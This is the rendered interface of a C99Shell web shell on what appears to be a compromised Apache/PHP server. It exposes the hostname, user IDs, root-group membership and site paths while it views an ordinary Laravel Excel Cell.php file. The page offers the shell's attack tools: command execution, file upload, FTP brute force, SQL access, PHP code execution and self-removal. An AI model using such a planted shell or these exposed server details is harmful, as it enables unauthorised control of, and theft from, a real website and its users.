!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/maatwebsite/excel/src/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Cell.php (2.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Maatwebsite\Excel;

use 
PhpOffice\PhpSpreadsheet\Calculation\Exception;
use 
PhpOffice\PhpSpreadsheet\Cell\Cell as SpreadsheetCell;
use 
PhpOffice\PhpSpreadsheet\RichText\RichText;
use 
PhpOffice\PhpSpreadsheet\Style\NumberFormat;
use 
PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;

/** @mixin SpreadsheetCell */
class Cell
{
    use 
DelegatedMacroable;

    
/**
     * @var SpreadsheetCell
     */
    
private $cell;

    
/**
     * @param  SpreadsheetCell  $cell
     */
    
public function __construct(SpreadsheetCell $cell)
    {
        
$this->cell $cell;
    }

    
/**
     * @param  Worksheet  $worksheet
     * @param  string  $coordinate
     * @return Cell
     *
     * @throws \PhpOffice\PhpSpreadsheet\Exception
     */
    
public static function make(Worksheet $worksheetstring $coordinate)
    {
        return new static(
$worksheet->getCell($coordinate));
    }

    
/**
     * @return SpreadsheetCell
     */
    
public function getDelegate(): SpreadsheetCell
    
{
        return 
$this->cell;
    }

    
/**
     * @param  null  $nullValue
     * @param  bool  $calculateFormulas
     * @param  bool  $formatData
     * @return mixed
     */
    
public function getValue($nullValue null$calculateFormulas false$formatData true)
    {
        
$value $nullValue;
        if (
$this->cell->getValue() !== null) {
            if (
$this->cell->getValue() instanceof RichText) {
                
$value $this->cell->getValue()->getPlainText();
            } elseif (
$calculateFormulas) {
                try {
                    
$value $this->cell->getCalculatedValue();
                } catch (
Exception $e) {
                    
$value $this->cell->getOldCalculatedValue();
                }
            } else {
                
$value $this->cell->getValue();
            }

            if (
$formatData) {
                
$style $this->cell->getWorksheet()->getParent()->getCellXfByIndex($this->cell->getXfIndex());
                
$value NumberFormat::toFormattedString(
                    
$value,
                    (
$style && $style->getNumberFormat()) ? $style->getNumberFormat()->getFormatCode() : NumberFormat::FORMAT_GENERAL
                
);
            }
        }

        return 
$value;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--